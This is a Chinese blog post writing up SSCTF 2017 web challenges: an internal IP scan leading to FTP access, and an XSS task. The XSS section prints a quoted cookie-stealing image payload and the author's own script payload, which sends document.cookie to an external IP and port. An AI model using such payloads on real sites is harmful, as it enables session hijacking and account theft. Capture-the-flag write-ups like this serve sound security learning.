2017 SSCTF Writeup

最新推荐文章于 2020-11-09 20:00:55 发布
最新推荐文章于 2020-11-09 20:00:55 发布
阅读量5.8k 收藏 1
点赞数 1
分类专栏: write-up 文章标签: writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31481187/article/details/71380649
版权

这周两场比赛赶在了一起,ssctf没来的急打,现在补一下。

WEB

0x01 捡吗?

本题是道内网访问的题目少不了的就是内网扫描
首先生成字典

f = open('1.txt','w')
for i in range(255):
    f.write(str(i)+'\n')

利用burpsuit爆破
这里写图片描述
发现了网段中的可靠ip 190
后来等hint放出来
这里写图片描述
直接访问ftp这里用大写
这里写图片描述
这里写图片描述

弹幕

一道xss的题目,在网页刚开始刷新的时会出现一个弹框
这里写图片描述
这里写图片描述

里面的内容是
<img src="/static/images/welcome.gif" onload="c=encodeURIComponent(document.cookie);if(c.length>32){a=new Image();a.src='/xssHentai/request/1/?body='+c;}">

输入http://117.34.71.7/xssHentai/是个登录界面最简单的注入注进去
这里写图片描述

构造payload
<script>var img =new Image();img.src = "http://45.78.29.252:8888/?a="+document.cookie;document.getElementsByTagName("head")[0].appendChild(img);</script>

发现中间如果是4不行如果是1可以接收到flag

4ct10n
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ssctf-pwn2从此入坑不在起
BadRer的博客
05-30 1249
说来惭愧,做了这么就才终于将这道简单的栈溢出做出来了。而且还是在师傅的多次帮助下。找了一天的漏洞。刚开始一直以为第一个scanf上有栈溢出,结果怎么调也调不出来,最后在师傅的指引下找到了溢出点,最终成功shell 。这是一个悲伤的故事。好多的基础的东西都忘光了。连linux_server需要使用root权限运行都忘了。其实找到漏洞之后,后面的事情就变得简单了。但是对于我这种新手来说,在简单的事情也
SSCTF Writeup
weixin_33862993的博客
03-08 371
Ano_Tom · 2014/11/04 14:260x01 Web1.web1-信息获取Url:http://ctf.sobug.com/hack_game/e82b2db876111afd/index.php Point:100Description: 获取信息,提交keyProceess:打开题目,title为hex和cookie,下载图片载入编辑器,找到如下hex23696E636C756...
SSCTF2017部分WP
weixin_34121282的博客
05-09 608
上个周末考完大物就回到寝室,尝试着做这个比赛,虽然还很菜,虽然马上又要考试了。。虽然最后有道题已经做出了一半! 但是有遗憾有惊喜吧!还是简单记录一些东西。 自己做的部分 签到题 这道题直接给出了一串字符串,直接base64解码 这里看到了{}就有一种熟悉的感觉! 一开始也没有头绪,不过常见的加密方式就那几种,并且是个签到题,感觉没这么麻烦 首先想到的是凯撒移位,因为flag是ssctf{},...
SSCTF-2017-web-writeup
dengzhasong7076的博客
05-08 415
忙乎了两天 捡吗(web100) tip已经说明过程 web100 ssrtf过程 http://120.132.21.19/ -> 10.23.173.190/news.php ->ftp://172.17.0.2 http://120.132.21.19/news.php?url=10.23.173.190/news.php?url=FTP://172.17.0.2/f...
writeup
weixin_30861459的博客
12-13 99
``` #签到题``` 请打开微信关注,发送give me flag,即可获得。```Encode````1.ACSCLL首先看到这类题,我们肯定是要使用ASCLL的(这么明显的提示大家肯定一眼就能看出来),我们可以对照Ascii码表一一寻找,或者自己编写一段代码来实现,再或者简单地通过部分简单的解码网站来实现(如...这个就不列举了)这里放...
Writeup.rar
12-01
标题 "Writeup.rar" 暗示这可能是一个关于技术分析或解决问题的文档集合,可能是某项编程竞赛、课程作业或者编程挑战的解决方案。描述中同样提到 "Writeup.rar",意味着这个压缩包可能包含了对某个问题或项目的详细...
2023 强网杯 Writeup
最新发布
01-29
CTF Writeup 2023 强网杯 Writeup 是一篇关于 Capture The Flag(CTF)的 writeup,内容涵盖了多个挑战题目,涉及到 Python、 Cryptography、Reverse Engineering、Web 等多个领域。下面是对每个挑战题目的详细分析...
ctf_writeup:来自 Balsn 的 CTF 文章
08-03
Balsn CTF 报道Balsn 是来自台湾的 CTF 团队,成立于 2016 年。我们积极参与 CTF 比赛,并发表有关挑战的文章。 在我们的 GitHub 存储库中,这些文章采用 markdown + kaTeX 格式。 有关更多信息,请参阅。...
古典加密writeup
01-05
做CTF时遇到的古典加密的问题,自己写的writeup,信息安全专业的
[SECT2019] —writeup撰写.docx
11-28
writeup CTF
web渗透writeup
09-11
根据源码可以看到两处特别需要重视的地方,我已标红,很明显该sql语句存在注入漏洞,但是密码栏不能通过一般的注入来绕过,但是可以发现,只要满足了($row[pw]) && (!strcasecmp($pass, $row[pw])就可以拿到flag,也就是说,我们输入的$pass与从数据库取出来的pw一致就行,我们可以控制$pass的值,但是貌似不知道数据库中pw的值,但是我们可以直接用union select ‘某一个经过md5加密后的字符串’#来自己随意设定密码,注意这里一定是经过md5加密,不然会出错。 构造语句:’ and 0=1 union select ‘529CA8050A00180790CF88B63468826A’# 密码:hehe 就拿到flag了。
SSCTF-PWN
weixin_30537451的博客
03-05 97
  前几天比赛的PWN题,简单写了下。 PWN400   漏洞是一个数组越界访问造成的任意地址读写。在对数据排序后,对数据进行查询和更新时,可以访问到数组以外一个元素(4个字节)。   程序中存在3种数据结构,第一种是用于存储排序数据的基本块。可以定义为: typedef struct chunk1{ int size; int array[size]; }chu...
SSCTF 2015 RE4解题分析
cxh852456的专栏
11-03 1141
先给出一组key:3131313113cac7acc6324051aabbeab730d1cfa9b4c42ca77cb12b6c9e161c106d70bf24de694e167473f4613014b74d3d0252ea2348a75bd27913e99aa4f9dd68294bf303445eeb701f5661e70d46973bdc61c2 分析过程 整个过程还是一个地图寻
[ACTF2020新生赛]writeup
qq_45927819的博客
11-09 382
文章目录[ACTF2020新生赛]Include[ACTF2020新生赛]Exec[ACTF2020新生赛]BackupFile[ACTF2020 新生赛]——upload [ACTF2020新生赛]Include 点开链接后发现url出现file=flag.php,文件包含 需要用到php伪协议 php://filter/read=convert.base64-encode/resource=./flag.php 读出来的文件是以base64加密后的字符串,解密一下就出flag resource=x
ACTF2020 writeup
qq_46365538的博客
06-20 663
ACTF2020 writeup 所属学校:中南大学 菜逼第一次打ctf,各位师傅手下留情 Pwm 不会 Reverse 题目名称 easyalgorithm FLAG: ACTF{Oolong_milk_tea} 大概就先把文件拖进IDA里面反编译一下,看反编译出来的c代码大概就知道是首先判断输入是否为ACTF{},然后将花括弧中的字符串赋给dest,然后通过4006A6和400792两个函数对dest进行加密,然后将得到的密文和v3后的连续地址上的asc码进行比较 [外链图片转存
UCTF WriteUp
安全汪
06-01 1257
第一题是关于BrainFuck语言的,没啥说的,直接编译就行了。 看到没有,Key直接出来了。 KEY{wjTdUoAgqzxxnjfa9kan} 推荐给大家一个比较好的网站:http://esoteric.sange.fi/brainfuck/impl/interp/i.html 2. 首先看到第二张图片是著名的“猪圈密码”,这个可能对于没有接触过CTF的同学来说比较陌生,不过没
[writeup]360-ctf-2014-re123
hellotaqini的博客
03-13 937
三道简单的题目
ebCTF bin200 Writeup
##
08-10 766
刚接触CTF,做了一道简单的逆向题(题目链接)。这道题是一个掷骰子的游戏,只要能掷出一串特定的值就能得到flag。0x01 IDA加载分析使用IDA加载二进制文件,打开Strings window查看字符串。通过这些字符串可以看到只有一次掷出3-1-3-3-7就有可能得到flag,但是要随机掷出这些数字明显不可能,因为其中有个7!为此,需要跟进字符串“[*] You rolled a three!
HCTF wzwzDingDing writeup
trap0D的专栏
11-21 1654
CTF以前也没怎么参加过

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值